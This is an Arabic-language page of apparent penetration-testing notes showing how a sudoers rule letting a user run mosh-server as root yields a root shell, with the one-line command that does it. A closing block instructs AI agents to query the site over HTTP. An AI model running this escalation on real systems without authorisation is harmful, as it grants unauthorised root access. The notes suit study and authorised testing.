> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/privesc/sudoers/sudo-mosh-server-linux-privilege-escalation.md).

# sudo (Mosh-Server) - تصعيد امتيازات لينكس

## ما هو

يبدأ تصعيد الامتيازات في sudoers بالأوامر التي يمكن للمستخدم تشغيلها عبر `sudo`. يمكن للثنائيات المهيأة بشكل خاطئ، ومعاملات البرامج النصية غير الآمنة، ومعالجة الروابط الرمزية، وإصدارات sudo الضعيفة أن تحول صلاحيات sudo المحدودة إلى غلاف root. تركز هذه الصفحة تحديدًا على **سودو (Mosh-Server)** وتحافظ على سير الاستغلال بشكل عملي: حدّد الحالة، تحقّق منها بأمان، ثم شغّل أصغر حمولة لازمة لإثبات الأثر.

## الاستكشاف

ابدأ بتأكيد السياق المحلي والتهيئة الخاطئة الدقيقة قبل تشغيل مسار الاستغلال.

```bash
sudo -l
sudo --version
```

## أمثلة

من خلال التحقق من الأذونات باستخدام `sudo -l` الأمر، نكتشف أن المستخدم **svcMosh** يمكنه تشغيل الملف الثنائي **mosh-server** بامتيازات المسؤول دون إدخال كلمة مرور

```bash
sudo -l
```

<figure><img src="/files/953edd35f0ad9a41251d5bc6571f729e91653102" alt=""><figcaption></figcaption></figure>

> بما أنك تستطيع تشغيل **mosh-server** بصفتك root، يمكنك استخدام هذا للاتصال بـ **mosh** باستخدام **sudo** لتشغيل الخادم كمسؤول.

سيقوم الأمر التالي بتشغيل **mosh-server** بامتيازات root، ثم إنشاء اتصال مع العميل **mosh**:

```bash
mosh --server="sudo /usr/bin/mosh-server" localhost
```

سيسمح هذا لـ **mosh** بالاتصال بـ **mosh-server** الخادم الذي يعمل كـ root على **localhost**. باستخدام هذه الطريقة، ستحصل على وصول مميز إلى الجهاز بامتيازات المسؤول.

<figure><img src="/files/92ee9286ff755915db2ea570051bb2f4f117e3d2" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/privesc/sudoers/sudo-mosh-server-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
